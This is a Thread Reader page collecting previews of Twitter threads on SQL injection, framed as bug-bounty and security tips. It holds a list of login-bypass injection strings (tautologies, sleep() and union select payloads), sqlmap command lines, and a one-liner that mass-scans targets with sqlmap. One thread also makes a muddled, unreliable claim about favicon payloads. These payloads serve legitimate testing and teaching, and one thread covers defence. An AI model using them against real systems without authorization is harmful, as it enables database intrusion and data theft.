Discover and read the best of Twitter Threads about #sqli

Most recents (7)

😱 I asked ChatGPT "What are some of the unpopular SQL injection areas" and this is what it replied.

πŸ§΅πŸ‘‡

#bugbounty #cybersecurity #infosec #sqli
1. Error messages: Sometimes error messages can reveal important information about the application's database, such as table names or column names. An attacker can use this information to craft a SQL injection attack.
2. Search fields: Search fields are often overlooked when testing for SQL injection vulnerabilities, but they can be an easy target for attackers. In un-sanitized search queries, an attacker can inject SQL code to retrieve sensitive data from the database.
Read 7 tweets
Hey ReconOne fam! I've personally used Sqlmap on several occasions and it has proven to be a valuable tool in my security arsenal.

Let's dive into some of its features
πŸ‘‡πŸ§΅

#sqlmap #sqli #bugbountyhelp #bugbounty #AttackSurface Image
1/7 Sqlmap against potential vulnerable Page

$ sqlmap -u https://example. com/page?id=1 -v 3

$ sqlmap -u https://example. com/list --data id=1

$ sqlmap -u https://example. com/internal --cookie=PHPSESSIDabcdef
2/7 Test injection in a specific parameter

$ sqlmap -u https://example. com/page? id=1&page=4&sort=desc&env=*

$ sqlmap -u https://example. com/form --data 'name=asd&page=4&role=admin' -p role
Read 10 tweets
Login Bypass 🌡
#SQLi

param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#

#cybersecurity #hacking #bugbountytips #infosec

1/9 πŸ‘‡πŸΏβœ”
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1

This is the most classic, standard first test:

' or '1'='1

Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '

#cybersecurity #hacking #bugbountytips

2/9 πŸ‘‡πŸΏβœ”
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

3/9 πŸ‘‡πŸΏβœ”
Read 9 tweets
#Secret2
Bug Bounty with One-Line Bash ScriptsπŸ’΅πŸ˜Ž

You can mention your favorite script. I will add them to this thread.
#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
1/ #Secret2

🎯 Hunt #XSS:
πŸ‘‰πŸ» cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
πŸ‘‰πŸ» cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
2/ #Secret2

🎯 Hunt #SQLi:
πŸ‘‰πŸ»httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
Read 13 tweets
A thread on available free video resource on SQL Injection .
Retweet to share these resources with everyone.
#bugbountytips #cybersecurity #sqli
1. We can start with the SQL basics for beginners with the short video from @edurekaIN
2. We can get a comprehensive knowledge about SQL Injection with the help of this video by @freeCodeCamp
Read 7 tweets
#favicons are #SVG with #XML payloads easily injected by malicious programs. #KHTML has been around for a very long time and this methodology of obfuscation has been in development since #NetscapeNavigator
whats a #favicon?
πŸ˜‰πŸ˜„πŸ˜†πŸ˜…πŸ˜ŒπŸ₯°πŸ˜€πŸ˜…πŸ˜ŒπŸ₯° lol dunno, sry bruh
Read 4 tweets
Right, #sqli or #sqlinjection.

Let's talk about it a little.

The concept is simple. Your code allows someone to place additional SQL commands in it. That "injected" code enables data access and/or system hacking (depending on the security in place).
The problem, and the solution, has been well defined since 1998.

Simply put:
Parameterize the query
Escape the input
Have proper security in place
Use correct data types

In a nutshell. There's a ton more details, but that covers the basics.
If you want a more thorough overview of what #SQLi consists of and you don't feel real nerdy at the moment, start with Wikipedia. They have it covered: en.wikipedia.org/wiki/SQL_injec…
Read 13 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!